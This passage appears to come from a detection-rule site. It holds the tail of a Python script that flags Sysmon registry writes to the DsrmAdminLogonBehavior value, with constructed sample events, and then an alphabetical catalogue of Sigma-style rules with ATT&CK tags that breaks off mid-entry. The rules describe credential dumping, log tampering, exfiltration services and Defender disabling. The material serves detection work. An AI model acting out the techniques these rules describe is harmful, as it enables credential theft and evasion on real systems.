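SEVERITY = {0: 'low', 1: 'high', 2: 'critical'}


def parse_dword(details: str):
    """Return the integer in a Sysmon 'DWORD (0x...)' string, or None."""
    m = DWORD_RE.fullmatch(details.strip())
    return int(m.group(1), 16) if m else None


def classify_dsrm_event(event: dict):
    """Classify one Sysmon Event ID 13 record; None if it is not a write to
    DsrmAdminLogonBehavior."""
    if event.get('EventType') != 'SetValue':
        return None
    if not event.get('TargetObject', '').lower().endswith(DSRM_SUFFIX):
        return None
    value = parse_dword(event.get('Details', ''))
    if value is None:
        # Non-DWORD data written to a DWORD value is itself odd; keep it visible.
        return {'severity': 'medium', 'value': None,
                'meaning': 'non-DWORD write', 'image': event.get('Image')}
    return {'severity': SEVERITY.get(value, 'medium'),
            'value': value,
            'meaning': MEANING.get(value, 'undefined value'),
            'image': event.get('Image')}


def scan(events) -> list:
    """Return the non-None classifications, highest severity first."""
    order = {'critical': 0, 'high': 1, 'medium': 2, 'low': 3}
    hits = [c for c in map(classify_dsrm_event, events) if c is not None]
    return sorted(hits, key=lambda c: order[c['severity']])


# Constructed Sysmon-style events: an unrelated LSA value, the DSRM value set
# to 2 from reg.exe, a reset to 0 from regedit, and a write of string data.
SAMPLE_EVENTS = [
    {'EventType': 'SetValue', 'Image': r'C:\Windows\System32\lsass.exe',
     'TargetObject': r'HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel',
     'Details': 'DWORD (0x00000005)'},
    {'EventType': 'SetValue', 'Image': r'C:\Windows\System32\reg.exe',
     'TargetObject': r'HKLM\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior',
     'Details': 'DWORD (0x00000002)'},
    {'EventType': 'SetValue', 'Image': r'C:\Windows\regedit.exe',
     'TargetObject': r'HKLM\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior',
     'Details': 'DWORD (0x00000000)'},
    {'EventType': 'SetValue',
     'Image': r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
     'TargetObject': r'HKLM\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior',
     'Details': '2'},
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

    A write of "0" is still reported at low severity: on a DC the value normally does not exist at all, so any process touching it is worth a record even when the resulting setting is the safe one.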
  • DirectorySearcher Powershell Exploitation

    Aug 12, 2024 · attack.discovery attack.t1018

    Detects PowerShell use of DirectorySearcher to enumerate Active Directory and determine which computers are joined to the domain.

  • DirLister Execution

    Aug 12, 2024 · attack.discovery attack.t1083

    Detects the usage of "DirLister.exe", a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.

  • Disable Administrative Share Creation at Startup

    Aug 12, 2024 · attack.defense-evasion attack.t1070.005

    Detects the disabling of administrative share creation at startup. Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system.

  • Disable Exploit Guard Network Protection on Windows Defender

    Aug 12, 2024 · attack.defense-evasion attack.t1562.001

    Detects disabling of Windows Defender Exploit Guard Network Protection.

  • Disable Macro Runtime Scan Scope

    Aug 12, 2024 · attack.defense-evasion

    Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros.

  • Disable Microsoft Defender Firewall via Registry

    Aug 12, 2024 · attack.defense-evasion attack.t1562.004

    Detects registry modifications that disable the Microsoft Defender Firewall. Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage.

  • Disable of ETW Trace - Powershell

    Aug 12, 2024 · attack.defense-evasion attack.t1070 attack.t1562.006 car.2016-04-002

    Detects usage of PowerShell cmdlets to disable or remove ETW trace sessions.

  • Disable Or Stop Services

    Aug 12, 2024 · attack.defense-evasion

    Detects the usage of utilities such as 'systemctl' and 'service' to stop or disable tools and services.

  • Disable Powershell Command History

    Aug 12, 2024 · attack.defense-evasion attack.t1070.003

    Detects scripts or commands that disable the PowerShell command history by removing the PSReadline module.

  • Disable Privacy Settings Experience in Registry

    Aug 12, 2024 · attack.defense-evasion attack.t1562.001

    Detects registry modifications that disable the Privacy Settings Experience.

  • Disable PUA Protection on Windows Defender

    Aug 12, 2024 · attack.defense-evasion attack.t1562.001

    Detects disabling of Windows Defender PUA protection.

  • Disable Security Events Logging Adding Reg Key MiniNt

    Aug 12, 2024 · attack.defense-evasion attack.t1562.001 attack.t1112

    Detects the addition of a 'MiniNt' key to the registry. After a reboot, the Windows Event Log service stops writing events.

  • Disable Security Tools

    Aug 12, 2024 · attack.defense-evasion attack.t1562.001

    Detects disabling of security tools.

  • Disable System Firewall

    Aug 12, 2024 · attack.t1562.004 attack.defense-evasion

    Detects disabling of system firewalls, which could be used by adversaries to bypass controls that limit usage of the network.

  • Disable Tamper Protection on Windows Defender

    Aug 12, 2024 · attack.defense-evasion attack.t1562.001

    Detects disabling of Windows Defender Tamper Protection.

  • Disable Windows Defender AV Security Monitoring

    Aug 12, 2024 · attack.defense-evasion attack.t1562.001

    Detects attempts to disable Windows Defender using PowerShell.

  • Disable Windows Firewall by Registry

    Aug 12, 2024 · attack.defense-evasion attack.t1562.004

    Detects the EnableFirewall registry value being set to 0 to disable the Windows firewall.

  • Disable Windows IIS HTTP Logging

    Aug 12, 2024 · attack.defense-evasion attack.t1562.002

    Detects disabling of HTTP logging on a Windows IIS web server, as seen used by Threat Group 3390 (Bronze Union).

  • Disable Windows Security Center Notifications

    Aug 12, 2024 · attack.defense-evasion attack.t1112

    Detects the UseActionCenterExperience registry value being set to 0 to disable Windows Security Center notifications.

  • Disable-WindowsOptionalFeature Command PowerShell

    Aug 12, 2024 · attack.defense-evasion attack.t1562.001

    Detects the built-in PowerShell cmdlet Disable-WindowsOptionalFeature, part of the Deployment Image Servicing and Management (DISM) tooling. Like DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.

  • Disabled IE Security Features

    Aug 12, 2024 · attack.defense-evasion attack.t1562.001

    Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features.

  • Disabled MFA to Bypass Authentication Mechanisms

    Aug 12, 2024 · attack.persistence attack.t1556

    Detects when multi-factor authentication has been disabled, which might indicate malicious activity to bypass authentication mechanisms.

  • Disabled Volume Snapshots

    Aug 12, 2024 · attack.defense-evasion attack.t1562.001

    Detects commands that temporarily turn off Volume Snapshots.

  • Disabled Windows Defender Eventlog

    Aug 12, 2024 · attack.defense-evasion attack.t1562.001

    Detects the disabling of the Windows Defender event log, as seen in relation to LockBit 3.0 infections.

  • Disabling Multi Factor Authentication

    Aug 12, 2024 · attack.persistence attack.t1556

    Detects disabling of Multi Factor Authentication.

  • Disabling Security Tools

    Aug 12, 2024 · attack.defense-evasion attack.t1562.004

    Detects disabling of security tools.

  • Disabling Security Tools - Builtin

    Aug 12, 2024 · attack.defense-evasion attack.t1562.004

    Detects disabling of security tools.

  • Discovery of a System Time

    Aug 12, 2024 · attack.discovery attack.t1124

    Identifies use of various commands to query a system's time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.

  • Discovery Using AzureHound

    Aug 12, 2024 · attack.discovery attack.t1087.004 attack.t1526

    Detects AzureHound (a BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.

  • Disk Image Creation Via Hdiutil - MacOS

    Aug 12, 2024 · attack.exfiltration

    Detects the execution of the hdiutil utility in order to create a disk image.

  • Disk Image Mounting Via Hdiutil - MacOS

    Aug 12, 2024 · attack.initial-access attack.t1566.001 attack.t1560.001

    Detects the execution of the hdiutil utility in order to mount disk images.

  • Django Framework Exceptions

    Aug 12, 2024 · attack.initial-access attack.t1190

    Detects suspicious Django web application framework exceptions that could indicate exploitation attempts.

  • DLL Execution via Rasautou.exe

    Aug 12, 2024 · attack.defense-evasion attack.t1218

    Detects use of Rasautou.exe to load an arbitrary DLL specified with the -d option and execute the export specified with -p.

  • DLL Execution Via Register-cimprovider.exe

    Aug 12, 2024 · attack.defense-evasion attack.t1574

    Detects use of register-cimprovider.exe to execute an arbitrary DLL file.

  • DLL Load By System Process From Suspicious Locations

    Aug 12, 2024 · attack.defense-evasion attack.t1070

    Detects when a system process (i.e. one located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public".

  • DLL Load via LSASS

    Aug 12, 2024 · attack.execution attack.persistence attack.t1547.008

    Detects a method to load a DLL via the LSASS process using an undocumented registry key.

  • DLL Loaded From Suspicious Location Via Cmspt.EXE

    Aug 12, 2024 · attack.defense-evasion attack.t1218.003

    Detects cmstp loading "dll" or "ocx" files from suspicious locations.

  • DLL Loaded via CertOC.EXE

    Aug 12, 2024 · attack.defense-evasion attack.t1218

    Detects CertOC.exe being invoked to load a target DLL file.

  • Dllhost.EXE Execution Anomaly

    Aug 12, 2024 · attack.defense-evasion attack.t1055

    Detects a "dllhost" process spawning with no command-line arguments, which is very rare and could indicate process injection activity or malware mimicking similar system processes.

  • DllUnregisterServer Function Call Via Msiexec.EXE

    Aug 12, 2024 · attack.defense-evasion attack.t1218.007

    Detects MsiExec loading a DLL and calling its DllUnregisterServer function.

  • DNS Events Related To Mining Pools

    Aug 12, 2024 · attack.execution attack.t1569.002 attack.impact attack.t1496

    Identifies clients that may be performing DNS lookups associated with common currency mining pools.

  • DNS Exfiltration and Tunneling Tools Execution

    Aug 12, 2024 · attack.exfiltration attack.t1048.001 attack.command-and-control attack.t1071.004 attack.t1132.001

    Detects execution of well-known DNS exfiltration and tunneling tools.

  • DNS HybridConnectionManager Service Bus

    Aug 12, 2024 · attack.persistence attack.t1554

    Detects Azure Hybrid Connection Manager services querying the Azure Service Bus service.

  • DNS Query for Anonfiles.com Domain - DNS Client

    Aug 12, 2024 · attack.exfiltration attack.t1567.002

    Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes.

  • DNS Query for Anonfiles.com Domain - Sysmon

    Aug 12, 2024 · attack.exfiltration attack.t1567.002

    Detects DNS queries for "anonfiles.com", which is an anonymous file upload platform often used for malicious purposes.

  • DNS Query Request By Regsvr32.EXE

    Aug 12, 2024 · attack.execution attack.t1559.001 attack.defense-evasion attack.t1218.010

    Detects DNS queries initiated by "Regsvr32.exe".

  • DNS Query To AzureWebsites.NET By Non-Browser Process

    Aug 12, 2024 · attack.command-and-control attack.t1219

    Detects a DNS query by a non-browser process on the system to "azurewebsites.net". The domain has often been used by threat actors as a malware hosting and exfiltration site.

  • DNS Query to External Service Interaction Domains

    Aug 12, 2024 · attack.initial-access attack.t1190 attack.reconnaissance attack.t1595.002

    Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE.

  • DNS Query To MEGA Hosting Website

    Aug 12, 2024 · attack.exfiltration attack.t1567.002

    Detects DNS queries for subdomains related to the MEGA sharing website.

  • DNS Query To MEGA Hosting Website - DNS Client

    Aug 12, 2024 · attack.exfiltration attack.t1567.002

    Detects DNS queries for subdomains related to the MEGA sharing website.

  • DNS Query To Ufile.io

    Aug 12, 2024 · attack.exfiltration attack.t1567.002

    Detects DNS queries to "ufile.io", which has been abused by malware and threat actors as a method for data exfiltration.

  • DNS Query To Ufile.io - DNS Client

    Aug 12, 2024 · attack.exfiltration attack.t1567.002  ·

    Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration

  • DNS Query Tor .Onion Address - Sysmon

    Aug 12, 2024 · attack.command-and-control attack.t1090.003  ·

    Detects DNS queries to an ".onion" address related to Tor routing networks

  • DNS RCE CVE-2020-1350

    Aug 12, 2024 · attack.initial-access attack.t1190 attack.execution attack.t1569.002 cve.2020-1350 detection.emerging-threats  ·

    Detects exploitation of the DNS RCE bug reported in CVE-2020-1350 by detecting a suspicious sub process

  • DNS Server Discovery Via LDAP Query

    Aug 12, 2024 · attack.discovery attack.t1482  ·

    Detects DNS server discovery via LDAP query requests from uncommon applications

  • DNS TOR Proxies

    Aug 12, 2024 · attack.exfiltration attack.t1048  ·

    Identifies IPs performing DNS lookups associated with common Tor proxies.

  • DNS TXT Answer with Possible Execution Strings

    Aug 12, 2024 · attack.command-and-control attack.t1071.004  ·

    Detects strings used in command execution in a DNS TXT answer

  • DNS-over-HTTPS Enabled by Registry

    Aug 12, 2024 · attack.defense-evasion attack.t1140 attack.t1112  ·

    Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or to hide the process of exfiltrating data. With this enabled, organizations lose visibility into data such as query type, response and originating IP that are used to identify bad actors.

  • Docker Container Discovery Via Dockerenv Listing

    Aug 12, 2024 · attack.discovery attack.t1082  ·

    Detects listing or file reading of ".dockerenv", which can be a sign of potential container discovery

  • Domain Trust Discovery Via Dsquery

    Aug 12, 2024 · attack.discovery attack.t1482  ·

    Detects execution of "dsquery.exe" for domain trust discovery

  • DotNET Assembly DLL Loaded Via Office Application

    Aug 12, 2024 · attack.execution attack.t1204.002  ·

    Detects any assembly DLL being loaded by an Office Product

  • DotNet CLR DLL Loaded By Scripting Applications

    Aug 12, 2024 · attack.execution attack.privilege-escalation attack.t1055  ·

    Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.

  • Download File To Potentially Suspicious Directory Via Wget

    Aug 12, 2024 · attack.command-and-control attack.t1105  ·

    Detects the use of wget to download content to a suspicious directory

  • Download from Suspicious Dyndns Hosts

    Aug 12, 2024 · attack.defense-evasion attack.command-and-control attack.t1105 attack.t1568  ·

    Detects download of certain file types from hosts with dynamic DNS names (selected list)

  • Download From Suspicious TLD - Blacklist

    Aug 12, 2024 · attack.initial-access attack.t1566 attack.execution attack.t1203 attack.t1204.002  ·

    Detects download of certain file types from hosts in suspicious TLDs

  • Download From Suspicious TLD - Whitelist

    Aug 12, 2024 · attack.initial-access attack.t1566 attack.execution attack.t1203 attack.t1204.002  ·

    Detects executable downloads from suspicious remote systems

  • DPAPI Backup Keys And Certificate Export Activity IOC

    Aug 12, 2024 · attack.t1555 attack.t1552.004  ·

    Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.

  • DPAPI Domain Backup Key Extraction

    Aug 12, 2024 · attack.credential-access attack.t1003.004  ·

    Detects tools extracting the LSA secret DPAPI domain backup key from Domain Controllers

  • DPAPI Domain Master Key Backup Attempt

    Aug 12, 2024 · attack.credential-access attack.t1003.004  ·

    Detects anyone attempting a backup of the DPAPI Master Key. This event is generated at the source and not on the Domain Controller.

  • Driver Load From A Temporary Directory

    Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1543.003  ·

    Detects a driver load from a temporary directory

  • Driver/DLL Installation Via Odbcconf.EXE

    Aug 12, 2024 · attack.defense-evasion attack.t1218.008  ·

    Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs.

  • DriverQuery.EXE Execution

    Aug 12, 2024 · attack.discovery  ·

    Detects usage of the "driverquery" utility, which can be used to perform reconnaissance on installed drivers

  • Drop Binaries Into Spool Drivers Color Folder

    Aug 12, 2024 · attack.defense-evasion  ·

    Detects the creation of suspicious binary files inside the "\windows\system32\spool\drivers\color" folder, as seen in the blog referenced below

  • Droppers Exploiting CVE-2017-11882

    Aug 12, 2024 · attack.execution attack.t1203 attack.t1204.002 attack.initial-access attack.t1566.001 cve.2017-11882 detection.emerging-threats  ·

    Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe

  • Dropping Of Password Filter DLL

    Aug 12, 2024 · attack.credential-access attack.t1556.002  ·

    Detects dropping of DLL files in system32 that may be used to retrieve user credentials from LSASS

  • DSInternals Suspicious PowerShell Cmdlets

    Aug 12, 2024 · attack.execution attack.t1059.001  ·

    Detects execution and usage of the DSInternals PowerShell module, which can be used to perform what might be considered suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.

  • DSInternals Suspicious PowerShell Cmdlets - ScriptBlock

    Aug 12, 2024 · attack.execution attack.t1059.001  ·

    Detects execution and usage of the DSInternals PowerShell module, which can be used to perform what might be considered suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.

  • Dump Credentials from Windows Credential Manager With PowerShell

    Aug 12, 2024 · attack.credential-access attack.t1555  ·

    Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.

  • Dump Ntds.dit To Suspicious Location

    Aug 12, 2024 · attack.execution  ·

    Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location

  • Dumping of Sensitive Hives Via Reg.EXE

    Aug 12, 2024 · attack.credential-access attack.t1003.002 attack.t1003.004 attack.t1003.005 car.2013-07-001  ·

    Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.

  • Dumping Process via Sqldumper.exe

    Aug 12, 2024 · attack.credential-access attack.t1003.001  ·

    Detects a process dump via the legitimate sqldumper.exe binary

  • DumpStack.log Defender Evasion

    Aug 12, 2024 · attack.defense-evasion  ·

    Detects the use of the filename DumpStack.log to evade Microsoft Defender

  • Dynamic .NET Compilation Via Csc.EXE

    Aug 12, 2024 · attack.defense-evasion attack.t1027.004  ·

    Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.

  • Dynamic CSharp Compile Artefact

    Aug 12, 2024 · attack.defense-evasion attack.t1027.004  ·

    When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution.

  • Elise Backdoor Activity

    Aug 12, 2024 · attack.g0030 attack.g0050 attack.s0081 attack.execution attack.t1059.003 detection.emerging-threats  ·

    Detects Elise backdoor activity used by APT32

  • Email Exfiltration Via PowerShell

    Aug 12, 2024 · attack.exfiltration  ·

    Detects email exfiltration via PowerShell cmdlets

  • Enable BPF Kprobes Tracing

    Aug 12, 2024 · attack.execution attack.defense-evasion  ·

    Detects a common command used to enable BPF kprobes tracing

  • Enable LM Hash Storage - ProcCreation

    Aug 12, 2024 · attack.defense-evasion attack.t1112  ·

    Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM hashes. By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN Manager hash of your password in Active Directory and local SAM databases.

  • Enable Local Manifest Installation With Winget

    Aug 12, 2024 · attack.defense-evasion attack.persistence  ·

    Detects changes to the AppInstaller (winget) policy, specifically the activation of local manifest installation, which allows a user to install new packages via custom manifests.

  • Enable Microsoft Dynamic Data Exchange

    Aug 12, 2024 · attack.execution attack.t1559.002  ·

    Detects enabling of the Dynamic Data Exchange (DDE) protocol in all supported editions of Microsoft Word or Excel.

  • Enable Windows Remote Management

    Aug 12, 2024 · attack.lateral-movement attack.t1021.006  ·

    Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.

  • Enabled User Right in AD to Control User Objects

    Aug 12, 2024 · attack.persistence attack.t1098  ·

    Detects a scenario where a user is assigned the SeEnableDelegationPrivilege right in Active Directory, which would allow control of other AD user objects.

  • Enabling COR Profiler Environment Variables

    Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.defense-evasion attack.t1574.012  ·

    Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.

  • End User Consent

    Aug 12, 2024 · attack.credential-access attack.t1528  ·

    Detects when an end user consents to an application

  • End User Consent Blocked

    Aug 12, 2024 · attack.credential-access attack.t1528  ·

    Detects when end user consent is blocked due to risk-based consent.

  • Enumerate Credentials from Windows Credential Manager With PowerShell

    Aug 12, 2024 · attack.credential-access attack.t1555  ·

    Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.

  • Enumeration for 3rd Party Creds From CLI

    Aug 12, 2024 · attack.credential-access attack.t1552.002  ·

    Detects processes that query known 3rd party registry keys that hold credentials via the command line

  • Enumeration for Credentials in Registry

    Aug 12, 2024 · attack.credential-access attack.t1552.002  ·

    Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services.

  • Equation Group C2 Communication

    Aug 12, 2024 · attack.command-and-control attack.g0020 attack.t1041 detection.emerging-threats  ·

    Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools

  • Equation Group DLL_U Export Function Load

    Aug 12, 2024 · attack.g0020 attack.defense-evasion attack.t1218.011 detection.emerging-threats  ·

    Detects a specific export function name used by one of EquationGroup tools

  • Equation Group Indicators

    Aug 12, 2024 · attack.execution attack.g0020 attack.t1059.004  ·

    Detects suspicious shell commands used in various Equation Group scripts and tools

  • Esentutl Gather Credentials

    Aug 12, 2024 · attack.credential-access attack.t1003 attack.t1003.003  ·

    Conti recommended that its affiliates use esentutl to access a dumped NTDS file. Trickbot also uses this utility to get MSEdge info via its pwgrab module.

  • Esentutl Steals Browser Information

    Aug 12, 2024 · attack.collection attack.t1005  ·

    One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge using the built-in utility esentutl.exe.

  • Esentutl Volume Shadow Copy Service Keys

    Aug 12, 2024 · attack.credential-access attack.t1003.002  ·

    Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\Volume are captured.

  • ETW Logging Disabled For rpcrt4.dll

    Aug 12, 2024 · attack.defense-evasion attack.t1112 attack.t1562  ·

    Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll

  • ETW Logging Disabled For SCM

    Aug 12, 2024 · attack.defense-evasion attack.t1112 attack.t1562  ·

    Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)

  • ETW Logging Disabled In .NET Processes - Registry

    Aug 12, 2024 · attack.defense-evasion attack.t1112 attack.t1562  ·

    Detects potential adversaries stopping ETW providers from recording loaded .NET assemblies.

  • ETW Logging Disabled In .NET Processes - Sysmon Registry

    Aug 12, 2024 · attack.defense-evasion attack.t1112 attack.t1562  ·

    Detects potential adversaries stopping ETW providers from recording loaded .NET assemblies.

  • ETW Logging Tamper In .NET Processes Via CommandLine

    Aug 12, 2024 · attack.defense-evasion attack.t1562  ·

    Detects changes to environment variables related to ETW logging via the CommandLine. This could indicate potential adversaries stopping ETW providers from recording loaded .NET assemblies.

  • ETW Trace Evasion Activity

    Aug 12, 2024 · attack.defense-evasion attack.t1070 attack.t1562.006 car.2016-04-002  ·

    Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.

  • EventLog EVTX File Deleted

    Aug 12, 2024 · attack.defense-evasion attack.t1070  ·

    Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence

  • EvilNum APT Golden Chickens Deployment Via OCX Files

    Aug 12, 2024 · attack.defense-evasion attack.t1218.011 detection.emerging-threats  ·

    Detects the Golden Chickens deployment method as used by Evilnum and described in the ESET July 2020 report

  • Exchange Exploitation CVE-2021-28480

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-28480 detection.emerging-threats  ·

    Detects successful exploitation of the Exchange vulnerability reported as CVE-2021-28480

  • Exchange Exploitation Used by HAFNIUM

    Aug 12, 2024 · attack.initial-access attack.t1190 attack.g0125 detection.emerging-threats  ·

    Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity

  • Exchange PowerShell Cmdlet History Deleted

    Aug 12, 2024 · attack.defense-evasion attack.t1070  ·

    Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence

  • Exchange PowerShell Snap-Ins Usage

    Aug 12, 2024 · attack.execution attack.t1059.001 attack.collection attack.t1114  ·

    Detects adding and using Exchange PowerShell snap-ins to export mailbox data, as seen used by HAFNIUM and APT27.

  • Exchange Set OabVirtualDirectory ExternalUrl Property

    Aug 12, 2024 · attack.persistence attack.t1505.003  ·

    Detects an adversary setting the OabVirtualDirectory ExternalUrl property to a script, as recorded in the Exchange Management log

  • Executable from Webdav

    Aug 12, 2024 · attack.command-and-control attack.t1105  ·

    Detects executable access via webdav6. This can be seen in APT 29 activity, such as in the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/

  • Execute Code with Pester.bat

    Aug 12, 2024 · attack.execution attack.t1059.001 attack.defense-evasion attack.t1216  ·

    Detects code execution via Pester.bat (Pester - PowerShell module for testing)

  • Execute Code with Pester.bat as Parent

    Aug 12, 2024 · attack.execution attack.t1059.001 attack.defense-evasion attack.t1216  ·

    Detects code execution via Pester.bat (Pester - PowerShell module for testing)

  • Execute Files with Msdeploy.exe

    Aug 12, 2024 · attack.defense-evasion attack.t1218  ·

    Detects file execution using the msdeploy.exe LOLBIN

  • Execute From Alternate Data Streams

    Aug 12, 2024 · attack.defense-evasion attack.t1564.004  ·

    Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection.

  • Execute Invoke-command on Remote Host

    Aug 12, 2024 · attack.lateral-movement attack.t1021.006  ·

    Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.

  • Execute MSDT Via Answer File

    Aug 12, 2024 · attack.defense-evasion attack.t1218 attack.execution  ·

    Detects execution of "msdt.exe" using an answer file, which simulates the legitimate way of calling msdt via "pcwrun.exe" (for example from the Compatibility tab)

  • Execute Pcwrun.EXE To Leverage Follina

    Aug 12, 2024 · attack.defense-evasion attack.t1218 attack.execution  ·

    Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the Follina (CVE-2022-30190) vulnerability

  • Execution DLL of Choice Using WAB.EXE

    Aug 12, 2024 · attack.defense-evasion attack.t1218  ·

    This rule detects that the DLL path written in the registry differs from the default one. When launched, WAB.exe tries to load the DLL from the registry.

  • Execution Of Non-Existing File

    Aug 12, 2024 · attack.defense-evasion  ·

    Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)

  • Execution of Powershell Script in Public Folder

    Aug 12, 2024 · attack.execution attack.t1059.001  ·

    This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder

  • Execution Of Script Located In Potentially Suspicious Directory

    Aug 12, 2024 · attack.execution  ·

    Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc.

  • Execution via stordiag.exe

    Aug 12, 2024 · attack.defense-evasion attack.t1218  ·

    Detects the use of stordiag.exe to execute schtasks.exe, systeminfo.exe and fltmc.exe

  • Execution via WorkFolders.exe

    Aug 12, 2024 · attack.defense-evasion attack.t1218  ·

    Detects using WorkFolders.exe to execute an arbitrary control.exe

  • Exploit for CVE-2015-1641

    Aug 12, 2024 · attack.defense-evasion attack.t1036.005 cve.2015-1641 detection.emerging-threats  ·

    Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641

  • Exploit for CVE-2017-0261

    Aug 12, 2024 · attack.execution attack.t1203 attack.t1204.002 attack.initial-access attack.t1566.001 cve.2017-0261 detection.emerging-threats  ·

    Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262

  • Exploit for CVE-2017-8759

    Aug 12, 2024 · attack.execution attack.t1203 attack.t1204.002 attack.initial-access attack.t1566.001 cve.2017-8759 detection.emerging-threats  ·

    Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759

  • Exploitation of CVE-2021-26814 in Wazuh

    Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-21978 cve.2021-26814 detection.emerging-threats  ·

    Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814

  • Exploited CVE-2020-10189 Zoho ManageEngine

    Aug 12, 2024 · attack.initial-access attack.t1190 attack.execution attack.t1059.001 attack.t1059.003 attack.s0190 cve.2020-10189 detection.emerging-threats  ·

    Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189

  • Exploiting SetupComplete.cmd CVE-2019-1378

    Aug 12, 2024 · attack.privilege-escalation attack.t1068 attack.execution attack.t1059.003 attack.t1574 cve.2019-1378 detection.emerging-threats  ·

    Detects an exploitation attempt of the privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378

  • Explorer NOUACCHECK Flag

    Aug 12, 2024 · attack.defense-evasion attack.t1548.002  ·

    Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag, which allows all sub processes of that newly started explorer.exe to run without any UAC checks

  • Explorer Process Tree Break

    Aug 12, 2024 · attack.defense-evasion attack.t1036  ·

    Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost"

  • Exports Registry Key To an Alternate Data Stream

    Aug 12, 2024 · attack.defense-evasion attack.t1564.004  ·

    Detects exporting of the target registry key and hiding it in the specified alternate data stream.

  • External Disk Drive Or USB Storage Device Was Recognized By The System

    Aug 12, 2024 · attack.t1091 attack.t1200 attack.lateral-movement attack.initial-access  ·

    Detects external disk drives or plugged-in USB devices.

  • External Remote RDP Logon from Public IP

    Aug 12, 2024 · attack.initial-access attack.credential-access attack.t1133 attack.t1078 attack.t1110  ·

    Detects a successful logon from a public IP address via RDP. This can indicate a publicly-exposed RDP port.

  • External Remote SMB Logon from Public IP

    Aug 12, 2024 · attack.initial-access attack.credential-access attack.t1133 attack.t1078 attack.t1110  ·

